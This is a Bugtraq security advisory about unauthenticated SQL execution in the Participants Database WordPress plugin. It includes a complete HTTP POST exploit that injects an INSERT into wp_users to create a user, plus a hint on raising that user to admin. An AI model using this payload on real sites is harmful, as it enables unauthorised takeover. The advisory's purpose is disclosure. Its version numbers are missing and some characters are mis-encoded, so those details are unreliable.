Yarubo #1: Arbitrary SQL Execution in Participants Database for Wordpress

From: Yarubo Internet Security Scan <no-reply@yarubo.com>
To: bugtraq@securityfocus.com
Subject: Yarubo #1: Arbitrary SQL Execution in Participants Database for Wordpress

Yarubo #1: Arbitrary SQL Execution in Participants Database for Wordpress

Program: Participants Database <=
Severity: Unauthenticated attacker can fully compromise the Wordpress
Permalink: http://www.yarubo.com/advisories/1

\u20ac\u201d Info \u20ac\u201d

Participants Database is a popular Wordpress plugin that offers the
functionality needed to build and maintain a database of people. As of
today the plugin has been downloaded 92,089 times.

\u20ac\u201d Vulnerability details \u20ac\u201d

1. If any of the shortcodes is used (e.g. signup page) then it is
possible for anonymous (unauthenticated) users to trigger some
administrative actions.

2. The action "export CSV" takes a parameter called "query" that can
contain an arbitrary SQL query. This means that an unauthenticated
user can execute arbitrary SQL statements (e.g. create an admin user,
read or write files, or execute code depending on the MySQL user

\u20ac\u201d Exploit \u20ac\u201d

Add a user to wordpress as follows (if you want an admin user, add
admin privileges to wp_usermeta):

POST /wordpress/pdb-signup/ HTTP/1.1
Host: www.example.com
Content-Length: 789
Content-Type: multipart/form-data;

Content-Disposition: form-data; name="action"

output CSV
Content-Disposition: form-data; name="CSV_type"

participant list
Content-Disposition: form-data; name="subsource"

Content-Disposition: form-data; name="query"

INSERT INTO wp_users
VALUES (31337,0x74657374,0x245024425a7a59615354486f41364b693355363576772f5461473861412f475a4b31,0x59617275626f,0x7465737440746573742e636f6d,0x323031342d31312d31312030303a30303a3030,0,0x59617275626f);


\u20ac\u201d Solution \u20ac\u201d

This issue has been fixed in version Download the newest version from:


\u20ac\u201d Credit \u20ac\u201d

Yarubo Research Team
research [at] yarubo.com

Network Security Scan:

Free Heartbleed Scan:

Copyright © 1995-2020 LinuxRocket.net. All rights reserved.